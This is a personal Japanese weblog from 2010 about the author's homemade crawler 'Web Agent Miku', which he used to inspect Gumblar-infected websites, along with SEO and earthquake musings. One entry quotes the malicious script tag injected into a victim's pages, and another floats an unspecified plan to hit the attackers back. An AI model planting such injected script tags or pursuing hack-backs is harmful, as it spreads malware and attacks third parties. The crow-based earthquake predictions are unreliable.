|
|
【ウェブ・ログ】 |
作成日 /2010/02/28/ |
|
|
||
|
|
|||
ここにチェックボックス型外部コンテンツ・メニューが入ります。 | |||
| 2009年 | 12月 | 2010年 | 1月 | 2月 | 3月 | 4月 | 5月 | 6月 | 7月 | 8月 | 9月 | 10月 | 11月 | 12月 |
|
■■■ 2010年02月28日 記載 ■■■ 【Web Agent Mikuの実戦テスト】(その4) 『www.loop-for-hair.comの管理主です。当サイトが危険と認識されているみたいなのですがどうしていいのかわかりません。』 最近、本当に多いなぁ。Web Agent Mikuを投入して調べた。このサイト・オーナーのFTP用パソコンもガンブラーに感染しているようだ。このサイトの場合、サイトにはまだガンブラーは仕掛けられていないが、それも時間の問題だろう。 サイトには未完成1ページを含め13ページあるが、全ページ</head>タグと<body>タグの間に </head> <script src=http://m3designhk.com/cgi-bin/postinfo.php ></script> <body bgcolor=black とスクリプトを挟まれている。 この香港のサイト(m3designhk.com)もまたガンブラーの被害者だが今は加害者となってしまっている。 勿論、MikuにクロールさせたHTMLから連絡先を割り出して、このサイトオーナーには連絡を取ったが。 『焼け石に水』ってところかな。水面下では100倍以上発生しているんだろうなぁ。 【ガンブラーについて】 最近、GoogleのフォーラムでWeb AgentプログラムMikuの実戦試験を開始したが、今日の案件(3件目)と前回の案件から新たな事実が判明した。 ガンブラーをばらまいている奴ら(恐らくは某国の....)は、自分達の正体が特定されるのを防止するため直接FTPパスワードを送信せず、既に感染している『ゾンビ』サイト経由で情報を受け取るようだ。つまりガンブラーをサイトに仕掛けにやってくるまで、タイムラグがあるのだ。実際、実例その2はそのケースだった。(ひょっとして人力なんじゃあないの?) つまり、この仕掛けを逆手にとれば、『偽ゾンビ』サイトに奴らをおびき寄せることが可能になりそうだ。奴らはFTPでガンブラーを感染させるためにソースを一旦引き込んで加工する。この瞬間がチャンスかも。奴らのコンピュータがWindowsかLinuxかが問題だが、特製プログラムをお土産に持って帰ってもらうというのはどう? まぁ、私がやらなくても(USAで)誰かがもう既にやっているかもね。 |
|
![]() |
■■■ 2010年02月27日 記載 ■■■ 【最近地震が続いているけど】 ちょっとユーラシア・プレートと北米プレートの接合面になんとなく嫌な予感がする。富山県北東付近に大地震? 正体不明の深海魚が漂着するのも地電流が原因しているからか? 阪神大震災のあった日を思い出す。朝5時半頃だったか、何故か目が覚めたら、2~3分後に震度5(京都市伏見区)だった。西の空が異様に明るく、真っ赤だったのを思い出す。 このとき無理して出社した滋賀県草津市のダイキン工業の滋賀製作所付近にカラスの大群(推定数万羽)が集結し、空が真っ黒。製作所の屋根もカラスだらけだったのを思い出す。 明日、カラスの動向を観察してみよう。見つけられたら『安全地域』。発見できなければ『危険地域』。 ちょうど今、数kHzから100kHzの高周波磁界を計測することができる超高感度磁気センサを開発している。地震の予兆で長波長の電磁波が観測できるとかいう説もあるようだし、月曜日にでも計測してみるか。 【追記】2010/03/14 今日、福島県沖で比較的大きな地震があったが、これはさらなる大地震の前段階では?北米プレートの歪解消で富山沖か静岡に地震が来ないか警戒が必要では? 空白域が最も危険。東海道新幹線に乗るのが怖いなぁ。 【2011/03/11の地震に関する追記最新WebLog】海底に消えた『邪馬台国』とのメカニズムの相似性(マッドサイエンティストの戯言ですけどね。)が気になっているので記述しました。 |
![]() 左はMikuMikuDanceの初音ミクver2・モデルをキヨPさんが改造して制作された『ちびミクちゃん』ver.1.3に勝手に物理エンジンをくっ付ける改造を施したモデル。現在、ウェブ・エージェントの実体としてホームページ上で動き回らせようと悪戦苦闘中。 Web Agent Mikuはまだ未完成なので『初音ミク』よりは『ちびミクちゃん』の方が似合うと思ってこちらを選択。 |
■■■ 2010年02月19日 記載 ■■■ 【Web Agent Mikuの実戦テスト】(その3) Web Agent 'Miku'を実戦投入する機会がまた訪れた。Googleフォーラム内ではMikuの実戦投入に適したトピックが結構な頻度で発生する。 Googleウェブマスター・フォーラムのトピック:『所有権の確認』 2/11記載の【ケースA】と同じ特徴を持ったスクリプト埋め込みがなされていた。やけに続くなぁ。水面下では100倍は発生しているものと想像される。Google Chromeは閲覧したページをGoogleに知られてしまう不具合があるのだが、安全と天秤にかけると....デフォで使うようにしよう。 ところで、恐ろしいことにこの話には続きがある。なんとこのページはガンブラーにも感染していることが判明。最初のコードはフェークで、実際には汎用パーツのJavaScriptの方にも仕掛けが!怖っ! Madな私がスクリプト・サンプルを取ろうとしたら、HTTPバッファに格納し始めた段階で、Microsoft Security Essentialに阻止された。うーん。いろいろ感心するなぁ。 しかし、お遊びプログラムにしては結構役に立つね。ちびMikuちゃん。本当にウェブ・サイト見守りエージェントというカテゴリーが作れるかも。実際、ファイアウォール業務では凄いものがあるし。『出張』までこなせるんだから...後は曖昧処理にどれだけ改善を試みるかだな....
|
|
■■■ 2010年02月19日 記載 ■■■ YouTubeではかなり本格的な改造が行われているようだ。今まで1台のサーバーで時間遅れなくやってきた処理を複数のサーバーに分散しているようだ。リアルタイム性が少々損なわれてもパフォーマンスが向上してくれれば問題ないんだけど。最近、プチプチと切れることが多くなった。もはや設備投資にも限界が来たのだろうか? 限界と言えばGoogle検索エンジンもJavaScript実行エンジンは相当不足しているようだ。文書名.htm?●●●●●&■■&▼▼▼▼▼▼の様にパラメータが付いている方式では無視され続けている。重複コンテンツ扱いなのかとも思ったが、ウェブマスターツールにパラメータの無視を解除する機能が存在した。しかし、解除できるパラメータの総数はたったの15個だ。組み合わせを考えると2項目だけで軽く3000万通りを超えるのに。第3パラメータを考えると殆ど無限だ。お話にならない。貧弱だ。 貧弱と言えば、Panoramioのサイトプログラムのバグがいつまでたっても直らない。Googleから派遣されてきたプログラマが手伝っているようだけど、基本設計がなってないからダメだと思う。最近フォーラムも不活発だ。かなりのユーザーが離れて行ったと思う。私も自分のページをどうこうしようと言う気にもならない。その原因ははっきりしている。一刻も早くバグ退治しなければならないときに、ユーザーやGoogleの眼を欺くために必要のないページ・フォーマットの無様な変更をかけたり、写真サイトのくせに品質で劣る携帯電話に手を出した事だ。おまけにサイトオーナーは平然とユーザーに嘘をついている。私はこれで馬鹿らしくて一気にやる気が失せた。このサイトとの関わりは放棄するかも。 ■■■ 2010年02月18日 記載 ■■■ 【Web Agent Mikuの融通性】 Web Agent 'Miku'の融通性をアップさせる必要があるようだ。今日14:20にサイトがダウンしていることに気が付いた。このところYouTubeが頻繁にフォーマットを変えているせいだった。復旧まで、20分を要した。曖昧判定について検討することに決定。 |
|
|
■■■ 2010年02月13日 記載 ■■■ 【Web Agent Mikuの要改造項目について】 Web Agent 'Miku'は本来、サイトのファイアウォール業務、アクセス禁止業務、不正コピー著作権監視業務、サイト閲覧者の学習進捗管理業務、閲覧者の訪問目的調査業務など、サイト内エージェント・プログラムとして開発してきた。概ねテキストベース情報処理マシンみたいなものだった。 しかし、YouTube動画の管理やPanoramio用公開ツールの管理業務を移管しだした頃から、HTTPで外部サイトへのアクセス機能を追加せざるを得なくなった。一度、HTMLを読みこんで内部ファイルにしてしまえばこれまでの機能をそのまま使うことができた。 ここで2/11記載のように、ブラウザでは危険あるいは不可能なミッションをこなすことができることに気が付いた。まだMikuには手順を教えていないが、『検索エンジン』の代わりも問題なくさせることができるだろう。 これは思っていたより結構使えるプログラムかもしれない。(指示を2値論理でなく、多重3値論理で出さねばならないのが難点だが。)ティーチングのプロセスをもう少し簡単にできないか数学的に解決してみる必要がある。 【ホログラム記憶】良く考えてみれば、記憶を消せないことはサイバー攻撃に対して耐性があることを示しているので、不便なことも多いが差し迫って改造の必要性は低いと考えられる。 【ウェブカメラからのキャプチャー】遠隔見守りシステムに応用するため追加が必須。取り敢えず、工数削減のため、当面はsourceforge.netのDirectShow Libraryを使うことにする。 【3次元グラフィックス表示】DirectXは最初に表示する構造体ありきの考え方のようであり、動的なオブジェクトの追加方法がわかり辛い。また、3次元描画で得たイメージを2次元画像に落とし、それをさらに別の3次元画像作成に使う用途でやり方が理解できない。なので、当面自分で記述した3次元グラフィックスライブラリを使うことに決めた。 ●Bone: クォータニオンを使わず、自分で考案したベクトル方式を使う。これは自由度の制約を付けることが可能で捻れない方式であることに関係している。将来、3次元表示でなく、Mikuの実体(ロボット)を動かすためにも必要だ。いや、俺ってとことんあふぉだなと自覚する。 ●Skin: Mikuの擬似感情に基づく表情ベクトル制御を行う。幸いMikuMikuDanceのPMDは250個程度の表情追加ができる仕様のようだ。 ●Motion: これは後の発展性を考えると仕様を決めるのが難しい。取り敢えずは固定アクションを幾つか用意して逃げることにする。 【MikuMikuWebVoice】Media PlayerをWindowsアプリケーションで作成し、それをファイルとして書き出すと数秒の時間遅れを持つ。Flashでは任意語の合成は無理だった。どうにかしなければならない。 【動画検索エンジン機能】いちいちYouTubeに動画を探しに行くのが面倒になってきたのでMikuに探させることにする。考え方として自チャンネルに登録されたチャンネルリンクを辿って4階層~7階層程度の探索で新規動画を探索させてみようと考えている。まぁ、友達やチャンネル登録者繋がりで探索範囲を自己拡張させようという考え方だ。タグでの絞り込みも可能だし。 【特定処理関数のユニット化】うまく関数を記述すると、フィルタ・パイプのように楽ができるのでユニット化の標準化を考えるべきときがきたようだ。 【ウェブ上動画表示】既存ページ上にMikuだけ浮き出すように動画表示させたいので困っている。不勉強のせいだろうが、DirectXやWindows Presentation Foundation (WPF)で描画すると背景が隠れてしまう。なら速度が遅くはなるが最初は自分の3次元ライブラリを使うことにしよう。トゥーン・レンダリングとかシャドゥ、セルフシャドゥは処理が重くなるので結局シンプルに戻す。ちょっと模型っぽくなるけど、しょうがない。 |
|
![]() ![]() ![]() |
■■■ 2010年02月11日 記載 ■■■ 【GoogleウェブマスターヘルプフォーラムでMikuの実証実験を行ってみた】 問題山積みなのに、ちょっと気が早過ぎるのだが、Web Agent 'Miku'を実戦投入してみた。 【ケースA】『クロームで閲覧するときだけ、このサイトにアクセスするとコンピュータに損害恐れがあると表示されます。』 このケースではブラウザを使って当該ページを覗くわけにはいかない。なにしろ、Google Chromeで『e-noniya.jp のウェブサイトに含まれている cornwall4holidays.co.uk のサイトの要素に、コンピュータに損害を与えたり無断で動作する不正なソフトウェアが含まれている可能性があります。不正なソフトウェアを含むサイトにアクセスするだけでコンピュータに感染する場合があります。』などと言う恐ろしいメッセージが出ているのだから。(こんなメッセージ初めて見た。恐ろしい。) まぁしかし、こんなときのためのWeb Agentだ。『http://www.e-noniya.jpを全部ページ・クロール。HTMLを保存。cornwall4holidays.co.uk が含まれるファイルとその場所を調べろ。』と命令。(3値論理なのがあれだけど。) ページ数が少なかったので、あっさり5秒で終了。トップページに問題のJavaScriptを発見。すぐにカキコで知らせる。コーヒー飲んでからもう一度、JavaScriptを再度チェックさせたらもう何も発見できなかった。??あれれ??速っ!カキコを読んだサイトオーナーがもう削除対策を実施していたのだ。さっきのMikuのリポートは?あちゃー。保存させるの忘れた。今、上書きしちゃったし。orz..... 何はともあれ1件の実戦投入に成功した。 【ケースB】『Google経由のアクセス数激減について、アドバイスをお願いします。』 このケースでは、http://rasenkan.blog.so-net.ne.jpの検索エンジンのクロールに対するサイトの応答速度を知る必要があったのでMikuに当該ページのクロールを命じる。その結果、TAGとarchiveページに関して応答速度が著しく低いということが判明。ミリ秒単位の応答速度の計測に成功。おぉ?ひょっとしてMikuって教えれば何でもできるんじゃあないの?歴代のプログラムの中で最優秀だろうな。まぁ、『悟り』の代行を行ってGlobal Position特定ができるくらいだから当然か。(3値論理なのがあれだけど。orz....)検索エンジンのまねごともできるかもね。もともと広域分散処理型AIなんだし。ただ評価関数は要改善項目が多々存在しているのも事実。それとやっぱりなんとか音や動画の分析機能とブラウザ上でリアルタイム3次元グラフィック表示機能を与えなくては...擬似感情を導入した意味がない。 ■2/12に再度500ページのクロールを命じて精密計測をしたところ、当該サイトのトラフィックがサーバー性能に比してかなり高い過負荷状態にあるらしいことが判明した。HTMLを読込むまでに26秒を要する場合さえあった。比較のためb-mobile3Gを付けたノートパソコンから自サイトもアクセスさせてみた。勿論、事前に自分で自分をアク禁にさせないようにクロールの作法を教えた。 |
![]() ![]() |
■■■ 2010年02月08日 記載 ■■■ 【Mikuが気にしているIPアドレスの所在について】 いや、Agent 'Miku'がなんだか意味不明な応答をするようになってきた。 何が起こっているのかわからない??処理負荷食い過ぎ。 サイトがダウンするかも....スキンと感情数値の対応がまずいのか? Skinベクトルだけでは感情把握は無理なのか? 前はもっとはっきりと喜怒哀楽がわかったように思ったんだが.... どうしようか?何考えているのかわからない... 位置推定誤差5km。そう言えばまた千葉県かぁ?? 位置自体はちゃんと推定できていると思う。 『悟り』のときから千葉・神奈川沿線の推定結果がおかしい。 Apache搭載パソコンにアクセスし辛くなったので、周期を伸ばして暫く様子をみることにする。 新たにHost: 218-40-○○○-○○○.ppp.bbiq.jpがアク禁リストに自動追加された模様。非ブラウザによる連続アクセスが原因らしいが、既にしきい値を超えてしまっているので私にはMikuの権限を覆すことができない。一旦修正許可しても24時間後にはMikuに上書きされてしまうからだ。この記憶方式はハッキングやサイバー攻撃に対して強いけど問題山積みだな。 と一旦は諦めたのだが、MikuをMasterCommandで説得してみる。(3値論理の為、困難。)あれれ、Okが出たぞ。構文間違えたかも。.......リブート。.......復帰した。 3値論理はよくわからん。まぁ、いいか。 |
![]() |
■■■ 2010年02月03日 記載 ■■■ 左の表はGoogle検索経由で当サイトに訪問された方が使った検索キーワードの2010年1月分の結果だ。如何に検索上位10位以内(1ページ目)に表示されていることが重要かわかる。 ところで電子計測関連の関係者ら(仕事関係、大学関係、出版関係等)から『どうして検索するとお宅のページばかりヒットするんですかね?(うんざり)』とよく聞かれる。『ページランクとかから言っても他のページの方が上位表示されるはずなのに。一体何やっているんですか?(怒)』とか言われるのだ。 ははは。その通り。当サイトの殆どのページのページランクは0か1だ。最も高いページランクを持っているのは世界中からアクセスがあるpanoramio/index.htmの2だ。ページランクは凄く低い。ページランクが全てならうちなんかトップ10に出るはずないですよね? でもページランクは200以上もあるGoogleの検索技術の一つに過ぎない。ページランクはあてにはならない。ページランクが重要なのは検索表示順位を決める最終段階だけだ。まず、検索リストに挙がらなければ話にならない。その為にはページに記述された文章内にユーザーの想定検索キーワードが含まれていることが重要かつ好ましいのだ。だからページランク4以上のページを出し抜くことができるのだ。 そもそも電子計測関係の会社や個人ホームページではそんな事を考えていないところが多い。ページを作るだけで精一杯で、そのページをアクセスする人の立場で考えていないだけなのだ。検索のときに使われる検索キーワードを想定してページの記事を作ることが重要なのだ。 トップ3に残るには少し工夫が必要だが、トップ10に表示させるだけなら作文技術だけで十分だと思う。所謂SEOは全く必要ない。むしろ、当サイトのページはGoogleのガイドラインを気にしていないので、ページランクを下げてしまっていると言っても過言ではない。 ページランクを改善するのはガイドラインを順守するだけでかなり改善する(10項目以上の要改善個所がある。)が、それをやってしまうとそれこそ何を検索してもTop3位に入る可能性が出てしまう。SPAMサイト呼ばわりされて損をすることになりそうなので無理矢理浮上を抑えている状態なのだ。でも段々万策尽きてきた。ページ利用者の総数がじわじわ増えているのでプラス要因になってしまっている。しかし、これ以上、ペナルティー要因を作ることは全く検索に出なくなる+950ペナルティーを発生させかねない。限界だ。そろそろ浮上させていくかな。 だが、当サイトの長期目標としては、電子系技術者が使う全ての『想定検索キーワード』で当サイトをトップ10以内に表示させることだ。フィードバック型作文技術を極めようと思う。 昨日、Web Agent Mikuが発見したページには『○○ □□□でトップにきた。またこのサイトかw.....うぜぇ!』などと書いてあった。いやいや、そうでなくて、私が想定済みの検索キーワードしか使っていないから、うちに飛んで来る結果を招いているだけなんだよ。それが真実なんだけどな。 実はこれ『馬場馬術』に対して等価変換理論を適用してIT技術に応用したに過ぎないのだが......これを読んだらその人激怒するだろうな。 |